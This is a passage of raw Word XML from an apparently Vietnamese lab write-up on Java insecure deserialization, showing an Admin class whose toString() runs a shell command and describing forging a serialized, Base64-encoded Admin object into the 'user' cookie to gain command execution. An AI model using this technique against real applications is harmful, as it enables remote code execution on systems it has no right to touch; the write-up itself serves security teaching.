              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1525435A" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51959E53" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73E7ACB1" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19D8FAA3" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>public class Admin extends User {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34140E44" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">    private String getNameCMD;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00741263" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">    public Admin() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF1FE9B" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">        this.getNameCMD = "whoami";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01C18BAE" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79184B87" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="34167886" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">    @Override</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D1A8E9C" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">    public String toString() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EDDE005" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">        try {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00E8087F" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">            Process proc = Runtime.getRuntime().exec(this.getNameCMD);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FF8CAD0" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">            BufferedReader stdInput = new BufferedReader(new </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="609A9A18" w14:textId="37F79415" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>InputStreamReader(proc.getInputStream()));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26168022" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">            return stdInput.readLine();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="483E6F7E" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">        } catch (IOException e) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E481821" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">            return "";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ED27E48" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C437741" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4342F66B" w14:textId="77777777" w:rsidR="00AC5D23" w:rsidRPr="00AC5D23" w:rsidRDefault="00AC5D23" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00AC5D23">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59FBCC65" w14:textId="3BCAFC29" w:rsidR="00125E5B" w:rsidRPr="003F365E" w:rsidRDefault="003F365E" w:rsidP="007E2E7E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Class Admin</w:t>
      </w:r>
      <w:r w:rsidR="0075470A">
        <w:t xml:space="preserve"> là mộ class kế thừa </w:t>
      </w:r>
      <w:r w:rsidR="004345FB">
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE7C28">
        <w:t xml:space="preserve">có thuộc tính getNameCMD và khi khởi tạo được gán bằng giá trị </w:t>
      </w:r>
      <w:r w:rsidR="00842A8D">
        <w:t xml:space="preserve">whoami (đây là 1 lệnh trong shell). Thuộc tính này được sử dụng trong hàm </w:t>
      </w:r>
      <w:r w:rsidR="00C34353">
        <w:t xml:space="preserve">toString() nhằm thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="004345FB">
        <w:t xml:space="preserve">lệnh shell đã được gán trong thuộc tính getNameCMD </w:t>
      </w:r>
      <w:r w:rsidR="004345FB" w:rsidRPr="004345FB">
        <w:t xml:space="preserve">bằng cách gọi Runtime.getRuntime().exec(this.getNameCMD) và trả dòng đầu ra của tiến </w:t>
      </w:r>
      <w:r w:rsidR="004345FB">
        <w:t>trình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD0CFBE" w14:textId="77777777" w:rsidR="005D0F1F" w:rsidRDefault="00E962FF" w:rsidP="007E2E7E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidR="005D0F1F" w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAA435F" w14:textId="3464E23D" w:rsidR="008A4ED5" w:rsidRPr="008A4ED5" w:rsidRDefault="00E91992" w:rsidP="007E2E7E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="008A4ED5" w:rsidRPr="008A4ED5">
        <w:t>hực hiện bằng cách xây dựng payload chứa đối tượng Admin với thuộc tính getNameCMD tùy chỉnh. Payload này sau khi được serialize và mã hóa Base64 sẽ được chèn vào cookie user. Khi ứng dụng tiến hành deserialize và in đối tượng ra response, phương thức toString() của Admin sẽ gọi Runtime.exec(), cho phép thực thi lệnh tùy ý trên hệ thống</w:t>
      </w:r>
      <w:r w:rsidR="008A4ED5" w:rsidRPr="008A4ED5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34FC37" w14:textId="1981F63E" w:rsidR="00E962FF" w:rsidRPr="00184ED1" w:rsidRDefault="00E962FF" w:rsidP="007E2E7E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64948631" w14:textId="206140D9" w:rsidR="007E2E7E" w:rsidRPr="007E2E7E" w:rsidRDefault="00496551" w:rsidP="002704C5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007E2E7E">
        <w:t xml:space="preserve">Sau khi truy cập vào trang web, </w:t>
      </w:r>
      <w:r w:rsidR="0029537B" w:rsidRPr="007E2E7E">
        <w:t xml:space="preserve">giao diện hiển thị </w:t>
      </w:r>
      <w:r w:rsidR="007E2E7E" w:rsidRPr="007E2E7E">
        <w:t xml:space="preserve">một trang web đơn giản với tiêu đề “Level 1 website” được in đậm ở đầu trang. Bên dưới tiêu đề là một liên kết có tên “Hello Servlet”, cho phép người dùng điều hướng đến servlet xử lý chính của bài </w:t>
      </w:r>
      <w:r w:rsidR="004A7FA9">
        <w:t>lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A01773" w14:textId="30ECE38A" w:rsidR="00487173" w:rsidRPr="0029537B" w:rsidRDefault="00487173" w:rsidP="002704C5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762BC9CE" w14:textId="1DCA2E50" w:rsidR="00E26702" w:rsidRDefault="00E26702" w:rsidP="002704C5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E26702">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="705F6B7B" wp14:editId="217FB5EB">
            <wp:extent cx="5731510" cy="1474470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="322374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74721" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1474470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E24534" w14:textId="4EF39B07" w:rsidR="00F43328" w:rsidRPr="00F43328" w:rsidRDefault="004A7FA9" w:rsidP="002704C5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau khi nhấp vào liên kết, trang web chuyẻn hướng </w:t>
      </w:r>
      <w:r w:rsidR="00F43328">
        <w:t xml:space="preserve">đến </w:t>
      </w:r>
      <w:r w:rsidR="00F43328" w:rsidRPr="00F43328">
        <w:t xml:space="preserve">endpoint /hello-servlet. Tại đây, </w:t>
      </w:r>
      <w:r w:rsidR="00B17B5A">
        <w:t xml:space="preserve">trang web phản </w:t>
      </w:r>
      <w:r w:rsidR="00F43328" w:rsidRPr="00F43328">
        <w:t>hồi bằng một trang HTML đơn giản hiển thị dòng chữ:</w:t>
      </w:r>
      <w:r w:rsidR="00F43328">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F43328" w:rsidRPr="00F43328">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“Level 1 Hello Guest”</w:t>
      </w:r>
      <w:r w:rsidR="00B17B5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE66D08" w14:textId="6AD69507" w:rsidR="004A7FA9" w:rsidRPr="004A7FA9" w:rsidRDefault="00B17B5A" w:rsidP="009D2794">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết quả </w:t>
      </w:r>
      <w:r w:rsidR="002704C5">
        <w:t>cho thấy đoạn code backend của trang web đã k</w:t>
      </w:r>
      <w:r w:rsidR="002704C5" w:rsidRPr="002704C5">
        <w:t xml:space="preserve">hởi tạo một đối tượng User mặc định và lưu vào cookie user dưới dạng chuỗi Base64 sau khi tuần tự hóa. Trong lần truy cập đầu tiên, do cookie chưa tồn tại, đối tượng User được tạo mới với thuộc tính name = "Guest", và được in ra thông qua </w:t>
      </w:r>
      <w:r w:rsidR="00083A65">
        <w:t xml:space="preserve">magic method </w:t>
      </w:r>
      <w:r w:rsidR="002704C5" w:rsidRPr="002704C5">
        <w:t>toString()</w:t>
      </w:r>
      <w:r w:rsidR="009D2794">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7BEFDF" w14:textId="4A15AEC8" w:rsidR="00E26702" w:rsidRDefault="00E26702">
      <w:r w:rsidRPr="00E26702">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CDF110A" wp14:editId="41BA9E42">
            <wp:extent cx="5731510" cy="748665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16625549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54994" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="748665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE9621B" w14:textId="11307C2F" w:rsidR="009626BD" w:rsidRPr="009626BD" w:rsidRDefault="009626BD" w:rsidP="00D51656">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009626BD">
        <w:t xml:space="preserve">Để xác thực ứng dụng thực sự serialize/deserialize đối tượng từ cookie user, </w:t>
      </w:r>
      <w:r>
        <w:t>mình thực hiện</w:t>
      </w:r>
      <w:r w:rsidRPr="009626BD">
        <w:t xml:space="preserve"> tạo một </w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="009626BD">
        <w:t xml:space="preserve"> User giữ nguyên cấu trúc như bài lab nhưng thay đổi giá trị khởi tạo từ "Guest" thành "test"</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D83B92" w14:textId="04C2BBD8" w:rsidR="00172DB3" w:rsidRDefault="00172DB3" w:rsidP="00D51656">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00172DB3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DACF688" wp14:editId="2FC56008">
            <wp:extent cx="5753100" cy="1209675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="205451483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14834" name="Picture 1" descr="A computer screen with text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5753904" cy="1209844"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18805E39" w14:textId="77777777" w:rsidR="00D51656" w:rsidRDefault="00B3544F" w:rsidP="00D51656">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sau đó thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00306D3A">
        <w:t xml:space="preserve">tạo một đoạn code để in giá trị </w:t>
      </w:r>
      <w:r w:rsidR="00306D3A" w:rsidRPr="009626BD">
        <w:t>serialize</w:t>
      </w:r>
      <w:r w:rsidR="00306D3A" w:rsidRPr="009626BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00306D3A">
        <w:t xml:space="preserve">được tạo ra bằng cách </w:t>
      </w:r>
      <w:r w:rsidR="00485265">
        <w:t xml:space="preserve">tạo một giao diện web hiển thị đối tượng User đã được tuần tự hóa và chuyển thành </w:t>
      </w:r>
      <w:r w:rsidR="00D51656">
        <w:t>dạng base64 tương tự như cách mà đoạn code của bài lab đã làm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA39A73" w14:textId="44B96C66" w:rsidR="009626BD" w:rsidRDefault="009626BD" w:rsidP="00D51656">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009626BD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77C4EED9" wp14:editId="05B504FE">
            <wp:extent cx="5731510" cy="934085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="92547133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71336" name="Picture 1" descr="A screen shot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="934085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A89018D" w14:textId="33D69ED3" w:rsidR="00CF04EC" w:rsidRDefault="00CF04EC" w:rsidP="00D51656">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Khởi chạy code và thành công lấy được đoạn mã base64 tương ứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CE6075" w14:textId="55CB4AB2" w:rsidR="0074578A" w:rsidRDefault="0074578A">
      <w:r w:rsidRPr="0074578A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72FD83B3" wp14:editId="632217F7">
            <wp:extent cx="5731510" cy="352425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="77669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93877" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="352425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0FCDA6" w14:textId="73004818" w:rsidR="0074578A" w:rsidRDefault="00CF04EC">
      <w:r>
        <w:t xml:space="preserve">Thực hiện thay đổi cookie </w:t>
      </w:r>
      <w:r w:rsidR="00B6293F">
        <w:t xml:space="preserve">và </w:t>
      </w:r>
      <w:r w:rsidR="0033748D" w:rsidRPr="0033748D">
        <w:t xml:space="preserve">nội dung hiển thị chuyển từ Guest sang test, xác nhận </w:t>
      </w:r>
      <w:r w:rsidR="0033748D">
        <w:t>trang web</w:t>
      </w:r>
      <w:r w:rsidR="0033748D" w:rsidRPr="0033748D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001452AF">
        <w:t>đã</w:t>
      </w:r>
      <w:r w:rsidR="0033748D" w:rsidRPr="0033748D">
        <w:t xml:space="preserve"> deserialize đối tượng từ cookie và dùng giá trị này khi </w:t>
      </w:r>
      <w:r w:rsidR="001452AF">
        <w:t>render thành công:</w:t>
      </w:r>
      <w:r w:rsidR="0074578A" w:rsidRPr="0074578A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="574FFC28" wp14:editId="5A73D27F">
            <wp:extent cx="5731510" cy="772795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="18014025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02549" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="772795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7EAE35" w14:textId="6437CEF5" w:rsidR="001452AF" w:rsidRPr="0074578A" w:rsidRDefault="001452AF" w:rsidP="00804E36">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Từ kết quả trên, thực hiện tạo </w:t>
      </w:r>
      <w:r w:rsidR="008F7850" w:rsidRPr="008F7850">
        <w:t>nội dung cookie user bằng payload serialized khác (ví dụ một instance Admin). Khi ứng dụng deserialize, dù biến được ép kiểu User, đối tượng thực tế vẫn là Admin (đa hình), và toString() của Admin sẽ chạy thay vì User.toString()</w:t>
      </w:r>
      <w:r w:rsidR="003B2FDB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B2FDB" w:rsidRPr="003B2FDB">
        <w:t>và chạy lệnh hệ thống qua Runtime.exec()</w:t>
      </w:r>
      <w:r w:rsidR="00804E36">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F17536" w14:textId="6C04D983" w:rsidR="001120A2" w:rsidRDefault="00C545B6">
      <w:r w:rsidRPr="00C545B6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11196603" wp14:editId="1989B261">
            <wp:extent cx="5731510" cy="2731135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="149904606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46068" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2731135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A6BAA1" w14:textId="0A0620DF" w:rsidR="00804E36" w:rsidRDefault="00804E36">
      <w:r>
        <w:t>Thực hiện in payload trên giao diện web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05670161" w14:textId="37924C13" w:rsidR="00CC11EF" w:rsidRDefault="00717F5A">
      <w:r w:rsidRPr="00717F5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="027D4262" wp14:editId="26CC9151">
            <wp:extent cx="5731510" cy="1027430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="50831173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11732" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId17"/>
                    <a:srcRect t="8173"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1027430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
